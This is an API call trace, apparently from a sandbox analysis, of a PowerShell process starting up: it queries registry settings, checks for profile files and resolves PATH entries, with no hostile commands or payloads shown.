	[0502.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0502.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0502.003] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ec400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0502.003] VirtualQuery (in: lpAddress=0x1ebb00, lpBuffer=0x1ec9c0, dwLength=0x30 | out: lpBuffer=0x1ec9c0*(BaseAddress=0x1eb000, AllocationBase=0x170000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0502.009] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed958 | out: phkResult=0x1ed958*=0x320) returned 0x0
	[0502.009] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed8dc, lpData=0x0, lpcbData=0x1ed8d8*=0x0 | out: lpType=0x1ed8dc*=0x1, lpData=0x0, lpcbData=0x1ed8d8*=0x56) returned 0x0
	[0502.009] CoTaskMemAlloc (cb=0x5a) returned 0x1b850fe0
	[0502.009] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed8ac, lpData=0x1b850fe0, lpcbData=0x1ed8a8*=0x56 | out: lpType=0x1ed8ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed8a8*=0x56) returned 0x0
	[0502.009] CoTaskMemFree (pv=0x1b850fe0) 
	[0502.009] RegCloseKey (hKey=0x320) returned 0x0
	[0502.009] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed958 | out: phkResult=0x1ed958*=0x320) returned 0x0
	[0502.009] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed8dc, lpData=0x0, lpcbData=0x1ed8d8*=0x0 | out: lpType=0x1ed8dc*=0x1, lpData=0x0, lpcbData=0x1ed8d8*=0x56) returned 0x0
	[0502.009] CoTaskMemAlloc (cb=0x5a) returned 0x1b850fe0
	[0502.009] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed8ac, lpData=0x1b850fe0, lpcbData=0x1ed8a8*=0x56 | out: lpType=0x1ed8ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed8a8*=0x56) returned 0x0
	[0502.009] CoTaskMemFree (pv=0x1b850fe0) 
	[0502.009] RegCloseKey (hKey=0x320) returned 0x0
	[0502.010] CoTaskMemAlloc (cb=0x20c) returned 0x1b825970
	[0502.010] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b825970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0502.010] CoTaskMemFree (pv=0x1b825970) 
	[0502.010] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed510, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0502.010] CoTaskMemAlloc (cb=0x20c) returned 0x1b825970
	[0502.010] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b825970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0502.010] CoTaskMemFree (pv=0x1b825970) 
	[0502.010] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed510, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0502.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0502.011] SetErrorMode (uMode=0x1) returned 0x1
	[0502.011] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed8c0 | out: lpFileInformation=0x1ed8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0502.011] SetErrorMode (uMode=0x1) returned 0x1
	[0502.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0502.011] SetErrorMode (uMode=0x1) returned 0x1
	[0502.011] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed8c0 | out: lpFileInformation=0x1ed8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0502.011] SetErrorMode (uMode=0x1) returned 0x1
	[0502.011] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0502.011] SetErrorMode (uMode=0x1) returned 0x1
	[0502.011] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed8c0 | out: lpFileInformation=0x1ed8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0502.012] SetErrorMode (uMode=0x1) returned 0x1
	[0502.012] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0502.012] SetErrorMode (uMode=0x1) returned 0x1
	[0502.012] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed8c0 | out: lpFileInformation=0x1ed8c0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0502.012] SetErrorMode (uMode=0x1) returned 0x1
	[0502.012] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0502.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.012] CoTaskMemFree (pv=0x484960) 
	[0502.013] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0502.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.013] CoTaskMemFree (pv=0x484960) 
	[0502.013] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0502.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.013] CoTaskMemFree (pv=0x484960) 
	[0502.013] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0502.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.013] CoTaskMemFree (pv=0x484960) 
	[0502.017] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0502.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.017] CoTaskMemFree (pv=0x484960) 
	[0502.017] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0502.017] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.017] CoTaskMemFree (pv=0x484960) 
	[0502.019] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0502.019] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1edaa0 | out: lpMode=0x1edaa0) returned 1
	[0502.667] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0502.667] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.667] CoTaskMemFree (pv=0x484960) 
	[0502.670] SetEvent (hEvent=0x1c4) returned 1
	[0502.670] SetEvent (hEvent=0x320) returned 1
	[0502.670] SetEvent (hEvent=0x2f8) returned 1
	[0502.670] SetEvent (hEvent=0x300) returned 1
	[0502.671] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0502.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0502.671] CoTaskMemFree (pv=0x484960) 
	[0502.672] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed7f8 | out: phkResult=0x1ed7f8*=0x350) returned 0x0
	[0502.672] RegQueryValueExW (in: hKey=0x350, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ed77c, lpData=0x0, lpcbData=0x1ed778*=0x0 | out: lpType=0x1ed77c*=0x0, lpData=0x0, lpcbData=0x1ed778*=0x0) returned 0x2

Thread:
	id = 294
	os_tid = 0xe84


Thread:
	id = 297
	os_tid = 0xe9c


Thread:
	id = 620
	os_tid = 0xc4c


Thread:
	id = 621
	os_tid = 0xc50


Thread:
	id = 639
	os_tid = 0x1428


Thread:
	id = 700
	os_tid = 0x15e4


Thread:
	id = 701
	os_tid = 0x15e8

	[0437.821] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0468.660] LocalFree (hMem=0x4072c0) returned 0x0
	[0468.660] CloseHandle (hObject=0x1c4) returned 1
	[0468.660] CloseHandle (hObject=0x13) returned 1
	[0468.661] CloseHandle (hObject=0xf) returned 1
	[0468.661] RegCloseKey (hKey=0x300) returned 0x0
	[0468.662] RegCloseKey (hKey=0x2fc) returned 0x0
	[0468.662] RegCloseKey (hKey=0x2f8) returned 0x0
	[0468.662] LocalFree (hMem=0x407290) returned 0x0
	[0468.662] RegCloseKey (hKey=0x320) returned 0x0
	[0476.509] RegCloseKey (hKey=0x320) returned 0x0
	[0484.273] RegCloseKey (hKey=0x328) returned 0x0
	[0484.273] RegCloseKey (hKey=0x324) returned 0x0
	[0484.273] RegCloseKey (hKey=0x1c4) returned 0x0
	[0484.273] RegCloseKey (hKey=0x300) returned 0x0
	[0484.274] RegCloseKey (hKey=0x2f8) returned 0x0
	[0484.274] RegCloseKey (hKey=0x320) returned 0x0
	[0484.274] RegCloseKey (hKey=0x338) returned 0x0
	[0484.274] RegCloseKey (hKey=0x334) returned 0x0
	[0484.275] RegCloseKey (hKey=0x330) returned 0x0
	[0484.275] RegCloseKey (hKey=0x32c) returned 0x0
	[0496.281] RegCloseKey (hKey=0x370) returned 0x0
	[0496.281] RegCloseKey (hKey=0x36c) returned 0x0
	[0496.281] RegCloseKey (hKey=0x368) returned 0x0
	[0496.282] RegCloseKey (hKey=0x344) returned 0x0
	[0496.282] RegCloseKey (hKey=0x380) returned 0x0
	[0496.282] RegCloseKey (hKey=0x360) returned 0x0
	[0496.282] RegCloseKey (hKey=0x35c) returned 0x0
	[0496.283] RegCloseKey (hKey=0x358) returned 0x0
	[0496.283] RegCloseKey (hKey=0x354) returned 0x0
	[0496.283] RegCloseKey (hKey=0x350) returned 0x0
	[0496.283] RegCloseKey (hKey=0x34c) returned 0x0
	[0496.283] RegCloseKey (hKey=0x348) returned 0x0
	[0496.284] RegCloseKey (hKey=0x338) returned 0x0
	[0496.284] RegCloseKey (hKey=0x37c) returned 0x0
	[0496.284] RegCloseKey (hKey=0x378) returned 0x0
	[0496.284] RegCloseKey (hKey=0x340) returned 0x0
	[0496.285] RegCloseKey (hKey=0x33c) returned 0x0
	[0496.285] RegCloseKey (hKey=0x328) returned 0x0
	[0496.285] RegCloseKey (hKey=0x324) returned 0x0
	[0496.285] RegCloseKey (hKey=0x1c4) returned 0x0
	[0496.285] RegCloseKey (hKey=0x300) returned 0x0
	[0496.286] RegCloseKey (hKey=0x2f8) returned 0x0
	[0496.286] RegCloseKey (hKey=0x320) returned 0x0
	[0496.286] RegCloseKey (hKey=0x374) returned 0x0
	[0508.019] RegCloseKey (hKey=0x350) returned 0x0

Thread:
	id = 780
	os_tid = 0x14ac


Thread:
	id = 929
	os_tid = 0x18e4

	[0503.371] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0503.375] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0503.380] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.380] CoTaskMemFree (pv=0x484960) 
	[0503.381] VirtualQuery (in: lpAddress=0x1c7ada00, lpBuffer=0x1c7ae8c0, dwLength=0x30 | out: lpBuffer=0x1c7ae8c0*(BaseAddress=0x1c7ad000, AllocationBase=0x1be20000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0503.384] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.384] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.384] CoTaskMemFree (pv=0x484960) 
	[0503.387] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.387] CoTaskMemFree (pv=0x484960) 
	[0503.390] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.390] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.390] CoTaskMemFree (pv=0x484960) 
	[0503.399] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.399] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.399] CoTaskMemFree (pv=0x484960) 
	[0503.401] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.401] CoTaskMemFree (pv=0x484960) 
	[0503.403] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.403] CoTaskMemFree (pv=0x484960) 
	[0503.407] VirtualQuery (in: lpAddress=0x1c7adcb0, lpBuffer=0x1c7aeb70, dwLength=0x30 | out: lpBuffer=0x1c7aeb70*(BaseAddress=0x1c7ad000, AllocationBase=0x1be20000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0503.408] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.408] CoTaskMemFree (pv=0x484960) 
	[0503.411] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.411] CoTaskMemFree (pv=0x484960) 
	[0503.411] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.411] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.411] CoTaskMemFree (pv=0x484960) 
	[0503.412] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0503.412] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0503.412] CoTaskMemFree (pv=0x484960) 
	[0504.109] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0504.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.109] CoTaskMemFree (pv=0x484960) 
	[0504.655] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0504.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.655] CoTaskMemFree (pv=0x484960) 
	[0504.657] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0504.657] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.657] CoTaskMemFree (pv=0x484960) 
	[0504.659] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0504.659] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.659] CoTaskMemFree (pv=0x484960) 
	[0504.662] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0504.662] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.663] CoTaskMemFree (pv=0x484960) 
	[0504.665] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0504.665] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.665] CoTaskMemFree (pv=0x484960) 
	[0504.667] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0504.667] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.667] CoTaskMemFree (pv=0x484960) 
	[0504.669] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0504.669] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.669] CoTaskMemFree (pv=0x484960) 
	[0504.692] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0504.692] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.692] CoTaskMemFree (pv=0x484960) 
	[0505.546] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0505.547] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0505.547] CoTaskMemFree (pv=0x484960) 
	[0505.549] CoTaskMemAlloc (cb=0x104) returned 0x484960
	[0505.549] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x484960, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0505.550] CoTaskMemFree (pv=0x484960) 
	[0505.550] CoTaskMemAlloc (cb=0x128) returned 0x463210
	[0505.550] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x463210, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0505.550] CoTaskMemFree (pv=0x463210) 
	[0505.554] CoTaskMemAlloc (cb=0x20e) returned 0x1b8275e0
	[0505.554] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8275e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0505.554] CoTaskMemFree (pv=0x1b8275e0) 
	[0505.558] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0505.562] SetErrorMode (uMode=0x1) returned 0x1
	[0505.565] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0505.575] SetErrorMode (uMode=0x1) returned 0x1
	[0505.576] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0505.576] SetErrorMode (uMode=0x1) returned 0x1
	[0505.576] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0505.584] SetErrorMode (uMode=0x1) returned 0x1
	[0506.053] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0506.053] SetErrorMode (uMode=0x1) returned 0x1
	[0506.053] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0506.061] SetErrorMode (uMode=0x1) returned 0x1
	[0506.062] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0506.063] SetErrorMode (uMode=0x1) returned 0x1
	[0506.063] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0506.072] SetErrorMode (uMode=0x1) returned 0x1
	[0506.073] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ada40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0506.073] SetErrorMode (uMode=0x1) returned 0x1
	[0506.073] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7adbe0 | out: lpFindFileData=0x1c7adbe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0506.080] SetErrorMode (uMode=0x1) returned 0x1
